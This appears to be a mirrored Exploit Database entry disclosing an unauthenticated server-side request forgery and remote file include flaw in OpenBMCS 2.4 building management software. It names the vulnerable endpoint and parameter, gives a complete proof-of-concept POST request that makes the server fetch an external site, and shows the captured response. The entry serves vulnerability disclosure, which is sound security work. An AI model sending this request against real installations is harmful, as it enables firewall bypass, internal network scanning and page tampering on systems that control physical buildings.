OpenBMCS 2.4 – Server Side Request Forgery (SSRF) (Unauthenticated)

• Exploit Database
• 20 阅读

• 作者： LiquidWorm
  日期： 2022-01-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50670/

• # Exploit Title: OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated)
  # Exploit Author: LiquidWorm
  # Date: 26/10/2021
  
  OpenBMCS 2.4 Unauthenticated SSRF / RFI
  
  
  Vendor: OPEN BMCS
  Product web page: https://www.openbmcs.com
  Affected version: 2.4
  
  Summary: Building Management & Controls System (BMCS). No matter what the
  size of your business, the OpenBMCS software has the ability to expand to
  hundreds of controllers. Our product can control and monitor anything from
  a garage door to a complete campus wide network, with everything you need
  on board.
  
  Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include
  (RFI) vulnerability exists in OpenBMCS within its functionalities. The application
  parses user supplied data in the POST parameter 'ip' to query a server IP on port
  81 by default. Since no validation is carried out on the parameter, an attacker
  can specify an external domain and force the application to make an HTTP request
  to an arbitrary destination host. This can be used by an external attacker for
  example to bypass firewalls and initiate a service and network enumeration on the
  internal network through the affected application, allows hijacking the current
  session of the user, execute cross-site scripting code or changing the look of
  the page and content modification on current display.
  
  Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
   Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
   Apache/2.4.41 (Ubuntu)
   Apache/2.4.25 (Debian)
   nginx/1.16.1
   PHP/7.4.3
   PHP/7.0.33-0+deb9u9
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2022-5694
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php
  
  
  26.10.2021
  
  --
  
  
  POST /php/query.php HTTP/1.1
  Host: 192.168.1.222
  Content-Length: 29
  Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Sec-Ch-Ua-Mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Sec-Ch-Ua-Platform: "Windows"
  Origin: https://192.168.1.222
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: https://192.168.1.222/index.php
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Connection: close
  
  ip=www.columbia.edu:80&argu=/
  
  
  HTTP/1.1 302 Found
  Date: Tue, 14 Dec 2021 20:26:47 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Location: ../login.php
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 32141
  
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  <html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
  
  <!-- developed by CUIT -->
  <!-- 08/28/18, 8:55:54am --><head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" >
  <meta name="msvalidate.01" content="DB472D6D4C7DB1E74C6D939F9C8AA8B4" />
  <title>Columbia University in the City of New York</title>
  ...
  ...